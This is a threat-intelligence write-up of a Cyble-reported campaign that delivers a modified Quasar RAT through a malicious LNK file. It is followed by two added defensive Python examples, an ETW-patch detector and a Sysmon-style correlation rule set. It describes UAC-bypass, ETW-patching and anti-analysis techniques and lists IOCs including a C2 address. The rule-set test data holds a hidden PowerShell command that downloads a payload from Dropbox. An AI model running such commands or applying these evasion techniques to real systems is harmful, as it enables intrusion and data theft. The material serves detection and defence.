Keypoints
- Initial access is via a malicious .LNK inside an archive that likely arrives through phishing targeting Meta Ads professionals and job seekers.
- The LNK executes obfuscated PowerShell which downloads additional scripts from Dropbox and writes a lure PDF and a batch file to the victim’s Downloads folder.
- The attack performs extensive sandbox and virtualization checks (QEMU, VirtualBox, VMware, Sandboxie, Triage) plus multiple anti-debugging techniques to prevent analysis.
- Payloads are AES-encrypted and base64-encoded, decrypted only in memory, then decompressed and executed as a .NET assembly, which runs Quasar RAT with modified identifiers.
- Privilege escalation is attempted via PEB manipulation and PowerShell elevation with a fallback to CMSTPLUA COM UAC bypass; persistence is achieved through copying to C:\Windows\$rbx-onimai and creating a Registry Run key.
- Defense-evasion includes disabling ETW by patching EtwEventWrite in ntdll.dll and hiding/unhooking functions to avoid security telemetry and logging.
- CRIL attributes the campaign to a Vietnamese threat actor linked to prior campaigns (Ducktail) and observed use of additional families such as Stromkitty and MaaS delivery methods.
MITRE Techniques
- [T1566] Phishing – Delivered via archive containing the LNK file as phishing or spam emails. [‘The LNK file in a RAR archive may be delivered through phishing or spam emails.’]
- [T1059.001] Command and Scripting Interpreter: PowerShell – The LNK executes obfuscated PowerShell commands to download and run remote scripts. [‘The LNK file executes PowerShell commands.’]
- [T1059.003] Windows Command Shell – Batch files use cmd.exe and WMIC/findstr to inspect the environment and control flow. [‘Uses cmd.exe to execute wmic and findstr commands.’]
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Malware creates a Run registry entry to achieve persistence after reboot. [‘Added Run entry by modifying the Registry key.’]
- [T1218.003] CMSTP – CMSTPLUA COM object is used as a fallback UAC bypass to launch an elevated process. [‘CMSTPLUA is used for UAC bypass.’]
- [T1027.012] Obfuscated Files or Information: LNK Icon Smuggling – The LNK is disguised with a PDF icon to deceive victims. [‘LNK file comes with PDF Icon.’]
- [T1027.013] Obfuscated Files or Information: Encrypted/Encoded File – Payloads are AES-encrypted and base64-encoded, decrypted only in memory. [‘TA decrypts the payload using AES decryption.’]
- [T1562.001] Disabling Security Tools – The malware patches EtwEventWrite in ntdll.dll to disable event tracing and telemetry. [‘EtwEventWrite function in ntdll.dll is modified to disable event tracing.’]
- [T1497] Virtualization/Sandbox Evasion – Multiple checks detect QEMU, VirtualBox, VMware, Sandboxie, Triage, Wine, KVM, Hyper-V, and other analysis environments and abort execution if detected. [‘Checks for virtual environments (e.g., QEMU, VirtualBox, VMware, Sandboxie).’]
- [T1055] Process Injection – Decrypted payloads are invoked in-memory using Invoke-Expression, executing a .NET assembly without writing plaintext to disk. [‘Invoke-Expression is used to invoke decrypted payloads.’]
- [T1012] Query Registry – Scripts query registry keys and system WMI classes to collect configuration and environment information used in checks. [‘The script queries registry keys to gather system information for further checks, including checks related to virtualization.’]
- [T1082] System Information Discovery – Uses WMI (Win32_*) queries to collect disk, system, and OS edition details during sandbox and VM checks. [‘Using Windows Management Instrumentation Control gathers system information.’]
- [T1573] Encrypted Channel – Final-stage Quasar RAT uses encrypted channels (and earlier AES encryption) for C2 communications. [‘The final payload, Quasar RAT, establishes C2 communication over an encrypted channel (AES encryption used in earlier stages).’]
- [T1071] Application Layer Protocol – Quasar RAT communicates with its C2 over standard application-layer protocols such as HTTP. [‘After the payload is executed, the Quasar RAT communicates with its C2 server over standard HTTP or other application layer protocols.’]
Indicators of Compromise
- [SHA-256] Malware samples and archive – dc616cc55a345e448a058368aea7c99ab9dd2a9c8ec42674312b66dbc29b7878, 3de5e0b27c69c93b4c4b4812ed4453d4b81e99b7d407640a752e62e33b1ede2a, and 6 more hashes.
- [URL] Dropper/hosting locations – hxxps://www.dropbox[.]com/scl/fi/9p8no6tz85e09vg59kfwk/sav2_encrypt[.]txt?rlkey=hw7c83mq8uws216q3d4b1cfyi&st=4oycb9or&dl=1 (PowerShell payload host), and hxxps://www.dropbox[.]com/scl/fi/b9diosgl68vg9xlaytsbz/sav3_encrypt[.]txt?rlkey=k2ojylfvks6xyef3vb21n45gp&st=suprpdhv&dl=1 (additional payload).
- [IP/Host] Command-and-control – 144.76.68.248:4782 listed as a Quasar RAT host used in the campaign.
- [File names / artifacts] Lure and local artifacts – PositionApplied_VoyMedia.pdf, output.bat, Career_Development_Plan_for_Meta_Ads_Specialist_Hotpoint_With_Numerical.lnk (used as the initial lure), and PositionApplied_VoyMedia.rar.
Cyble Research and Intelligence Labs (CRIL) identified a targeted, multi-stage campaign that begins with a malicious .LNK file hidden inside an archive and aimed specifically at job seekers and digital marketing professionals, particularly those working with Meta Ads. The LNK executes a PowerShell one-liner which downloads a heavily obfuscated script from Dropbox; once retrieved, that script drops two base64-encoded components into the user’s Downloads folder—a lure PDF and a batch file—and launches them to continue the infection chain.
The batch file performs early environmental reconnaissance using WMIC to read disk and manufacturer strings and will exit immediately if it detects indicators of virtual machines such as QEMU, VirtualBox, or known Triage sandbox identifiers. If the system passes these checks, the batch triggers a de-obfuscated PowerShell routine that extracts two sets of base64 payloads from commented lines, decodes them, then AES-decrypts and GZip-decompresses the resulting blobs using hardcoded keys and IVs. The final output is an in-memory .NET executable invoked through PowerShell’s Invoke-Expression, avoiding writing the clear payload to disk.
That .NET loader performs a comprehensive battery of sandbox, virtualization, and debugging checks before executing its malicious payload. It queries WMI classes (Win32_DiskDrive, Win32_ComputerSystem, Win32_OperatingSystem) and inspects files, drivers, services, processes, device pipes, and desktop wallpaper bytes to spot emulation or analysis environments. Additional heuristics include measuring tick counts to detect emulation timing, matching the current username against a blacklist of typical sandbox/test accounts, searching for VM and hypervisor artifacts (drivers like balloon.sys or vboxguest files), and checking for analysis tool windows and process titles such as x32dbg, x64dbg, IDA, and Wireshark. If any check indicates an analysis environment, the loader throws an exception and halts execution.
Anti-debugging is equally layered: it leverages NtQueryInformationProcess and other native calls to spot attached debuggers, hides threads via NtSetInformationThread, uses PageGuard memory protections to trigger exceptions under debuggers, examines debug registers for hardware breakpoints, and attempts to neutralize debugger callbacks by overwriting DbgUiRemoteBreakin and DbgBreakPoint in ntdll. The code also contains routines that attempt to exploit or confuse debuggers (such as sending specially formatted OutputDebugString messages) and to detect kernel-level debugging, Secure Boot, Virtualization-Based Security (VBS), and memory integrity settings—aborting if the environment looks like a test bed.
To escalate privileges, the loader first checks whether it already has administrative rights. If not, it manipulates the Process Environment Block (PEB) to change the current process image and command line to resemble Explorer, then relaunches itself with PowerShell using “-Verb runas” in hidden mode. Should that approach fail, the malware uses the CMSTPLUA COM object (CLSID 3E5FC7F9-9A51-4367-9063-A120244FBEC7) with the “Elevation:Administrator!new:” prefix to invoke ShellExec as an alternative UAC bypass.
Once elevated, the malware establishes persistence by creating a hidden directory under C:\Windows named $rbx-onimai and copying itself there as $rbx-CO2.bat, deleting the original from Downloads, and scheduling execution via a hidden Start-Process call through PowerShell. It also writes a Run key entry under SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the value name $rbx-XVR to ensure execution at login.
Defense-evasion routines include in-memory patching of EtwEventWrite in ntdll.dll to disable Windows event tracing (using RETN 20 on 32-bit or RET on 64-bit) and decrypting an encrypted resource (1789d7d0-48bf-48f5-bad6-e0262117d577.tmp) with AES followed by GZip decompression. The decrypted and decompressed payload is a modified Quasar RAT: the threat actor altered identifiers such as certificate names and strings to hinder attribution while configuring the RAT with a host, subdirectory, install name, mutex, startup key, and log directory suited to this campaign. The reported Quasar configuration points the RAT to 144.76.68.248:4782, uses a subdirectory named $cnt-onimai2, an install name $cnt-CO2.exe, and a mutex of 928569f3-e524-4f67-936e-0d7f0a47cfad.
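The ETW patch described above leaves a very small and very recognisable footprint at the entry of EtwEventWrite, which is what a memory-forensics or EDR check looks for. The following is an added example written for this summary, not code from Cyble or from the malware: it classifies the first bytes of a function as read from a suspect process, using the RET (x64) and RETN 0x14 (x86) stubs named in the report, and also goes slightly beyond the report by flagging a relative jump at entry (an inline hook, which EDRs also install legitimately) and by diffing the in-memory bytes against the disk-mapped copy. The "clean" prologue bytes are constructed stand-ins, not the real ntdll bytes.

```python
# RET / RETN 0x14 stubs named in the report: on x64 the first instruction of
# EtwEventWrite becomes a bare RET (0xC3); on x86 it becomes RETN 0x14
# (0xC2 0x14 0x00), which returns and pops the 20 bytes of stdcall arguments.
X64_RET = b"\xc3"
X86_RETN_20 = b"\xc2\x14\x00"


def classify_prologue(prologue: bytes, arch: str) -> str:
    """Classify the first bytes of a function as read from process memory.

    'patched-ret' : starts with the ETW-silencing return stub for that arch
    'hooked-jmp'  : starts with a relative jump (an inline hook/detour; EDRs
                    do this legitimately, so treat it as 'inspect', not 'bad')
    'intact'      : neither pattern at entry
    """
    if arch == "x64" and prologue.startswith(X64_RET):
        return "patched-ret"
    if arch == "x86" and prologue.startswith(X86_RETN_20):
        return "patched-ret"
    if prologue[:1] in (b"\xe9", b"\xeb"):  # jmp rel32 / jmp rel8 at entry
        return "hooked-jmp"
    return "intact"


def first_divergence(in_memory: bytes, on_disk: bytes):
    """Offset of the first byte where the in-memory copy differs from the
    disk-mapped copy of the same function, or None when they match. Comparing
    against the pristine image is the arch-independent form of the check."""
    for off, (m, d) in enumerate(zip(in_memory, on_disk)):
        if m != d:
            return off
    if len(in_memory) != len(on_disk):
        return min(len(in_memory), len(on_disk))
    return None


# Constructed stand-ins for the on-disk prologue (NOT the real ntdll bytes)
# and the same bytes after the patch described in the report.
CLEAN_X64 = b"\x48\x89\x5c\x24\x08\x48\x89\x74\x24\x10"
PATCHED_X64 = X64_RET + CLEAN_X64[1:]
CLEAN_X86 = b"\x8b\xff\x55\x8b\xec"
PATCHED_X86 = X86_RETN_20 + CLEAN_X86[3:]

if __name__ == "__main__":
    for label, mem, disk, arch in [("x64", PATCHED_X64, CLEAN_X64, "x64"),
                                   ("x86", PATCHED_X86, CLEAN_X86, "x86")]:
        print(label, classify_prologue(mem, arch),
              "diverges from disk at offset", first_divergence(mem, disk))
```

In practice the bytes would come from reading the target process at the exported address of EtwEventWrite and from mapping the same ntdll.dll from disk; the signature check alone is enough to catch the stub the report describes, while the disk comparison catches any other modification of the entry.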
CRIL links this operation to a Vietnamese threat actor that has previously targeted digital marketing professionals, initially with Ducktail in mid-2022 and later expanding to use additional information-stealers and RATs as well as Malware-as-a-Service to scale operations. The choice of lure documents, victim profile, tools, and delivery mechanisms mirrors prior campaigns attributed to the same group, and analysts observed related deliveries that include variants such as Stromkitty.
The campaign demonstrates several notable operational lessons: using a benign-looking LNK inside an archive as the initial vector to lower suspicion, staging payloads across multiple encoded/encrypted layers so they only appear in cleartext in memory, and implementing a broad set of environment and debugger checks so the malware runs only on likely real, unmanaged hosts. By combining PEB manipulation, CMSTPLUA fallback elevation, ETW disabling, and in-memory execution of a modular Quasar RAT, the threat actor maximizes stealth, persistence, and post-compromise control.
To reduce exposure to similar campaigns, organizations should harden email filtering to detect and quarantine archive attachments containing LNK files, restrict PowerShell script execution via signed-only policies and logging, monitor for unusual PowerShell and cmd.exe parent-child relationships, deploy behavioral EDR that flags in-memory execution and ETW patching, limit user privileges to the minimum required, and ensure systems and endpoint protection are fully patched and centrally managed.
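The monitoring recommendations above translate directly into correlation rules over endpoint telemetry. The following is an added example, not code from Cyble or from any detection product: it runs a small rule set over constructed Sysmon-style events modelled on the chain this report describes (hidden PowerShell downloader spawned by Explorer, cmd.exe-driven WMIC hardware enumeration, the $rbx-* staging directory and Run value, and the reported Quasar C2 endpoint) and turns per-event hits into a host verdict. The event field names, the HKLM hive for the Run value and the dropbox.com path with an EXAMPLE-ID placeholder are assumptions made for the demo; only the $rbx-/$cnt- names and the C2 host:port come from the report.

```python
import re

# Indicators quoted from the report above: the $rbx-/$cnt- naming of the
# staging directory, install name and Run value, and the Quasar C2 endpoint.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\\$rbx-", re.IGNORECASE)
STAGING_DIR_RE = re.compile(r"^C:\\Windows\\\$(rbx|cnt)-", re.IGNORECASE)
C2_ENDPOINTS = {("144.76.68.248", 4782)}

# Generic behavioural patterns for the early stages: a hidden PowerShell
# downloader spawned by Explorer (what a double-clicked LNK looks like) and
# cmd.exe-driven WMIC hardware enumeration (the batch file's VM check).
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"(iwr|invoke-webrequest|downloadstring|downloadfile|dropbox\.com)",
                         re.IGNORECASE)
WMIC_HW_RE = re.compile(r"\b(diskdrive|computersystem|baseboard|bios)\b.*\b(get|list)\b",
                        re.IGNORECASE)


def assess_event(ev):
    """Return a list of (rule_id, description) findings for one event dict."""
    hits = []
    kind = ev.get("type")
    image = ev.get("image", "").lower()
    parent = ev.get("parent_image", "").lower()
    cmd = ev.get("command_line", "")
    if kind == "ProcessCreate":
        if (image.endswith("powershell.exe") and parent.endswith("explorer.exe")
                and HIDDEN_RE.search(cmd) and DOWNLOAD_RE.search(cmd)):
            hits.append(("PS-EXPLORER-HIDDEN-DL",
                         "hidden PowerShell downloader launched directly from Explorer (LNK-style)"))
        if image.endswith("wmic.exe") and parent.endswith("cmd.exe") and WMIC_HW_RE.search(cmd):
            hits.append(("WMIC-HW-ENUM",
                         "cmd.exe-spawned WMIC hardware enumeration (VM/sandbox check)"))
    elif kind == "RegistryValueSet":
        if RUN_KEY_RE.search(ev.get("target_object", "")):
            hits.append(("RUN-KEY-RBX", "Run value named $rbx-* written (campaign persistence)"))
    elif kind == "FileCreate":
        if STAGING_DIR_RE.search(ev.get("target_filename", "")):
            hits.append(("STAGING-DIR", "file written under a C:\\Windows\\$rbx-* or $cnt-* directory"))
    elif kind == "NetworkConnect":
        if (ev.get("dest_ip"), ev.get("dest_port")) in C2_ENDPOINTS:
            hits.append(("C2-KNOWN", "connection to the reported Quasar RAT C2 endpoint"))
    return hits


def assess_host(events):
    """Correlate per-event findings into a host verdict.

    A single generic rule (hidden PowerShell, WMIC enumeration) is only
    'suspicious'; two or more distinct stages, or a known C2 contact, is
    treated as 'compromised'.
    """
    findings = [(i, rule, desc)
                for i, ev in enumerate(events)
                for rule, desc in assess_event(ev)]
    rules = sorted({rule for _, rule, _ in findings})
    if "C2-KNOWN" in rules or len(rules) >= 2:
        verdict = "compromised"
    elif rules:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "rules": rules, "findings": findings}


# Constructed Sysmon-style events modelled on the chain described in the report.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -w hidden -c "iwr https://www.dropbox.com/scl/fi/EXAMPLE-ID/'
                     'sav2_encrypt.txt -OutFile $env:USERPROFILE\\Downloads\\output.bat"'},
    {"type": "FileCreate", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_filename": r"C:\Users\victim\Downloads\PositionApplied_VoyMedia.pdf"},
    {"type": "ProcessCreate", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\wmic.exe",
     "command_line": "wmic diskdrive get model"},
    {"type": "FileCreate", "image": r"C:\Windows\System32\cmd.exe",
     "target_filename": r"C:\Windows\$rbx-onimai\$rbx-CO2.bat"},
    {"type": "RegistryValueSet", "image": r"C:\Windows\System32\cmd.exe",
     "target_object": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$rbx-XVR"},
    {"type": "NetworkConnect", "image": r"C:\Windows\$cnt-onimai2\$cnt-CO2.exe",
     "dest_ip": "144.76.68.248", "dest_port": 4782},
]

# A benign event with the same parent/child pair but none of the behaviour.
BENIGN_EVENT = {"type": "ProcessCreate", "parent_image": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "command_line": "powershell.exe -NoProfile -Command Get-Date"}

if __name__ == "__main__":
    result = assess_host(SAMPLE_EVENTS)
    print(result["verdict"], result["rules"])
    for idx, rule, desc in result["findings"]:
        print(f"  event {idx}: {rule}: {desc}")
```

The point of the correlation step is that the two generic rules fire on legitimate administration often enough to be noisy on their own, while the campaign-specific names and the C2 endpoint are brittle and change between waves; requiring two distinct stages on the same host keeps the alert useful after the indicators rotate.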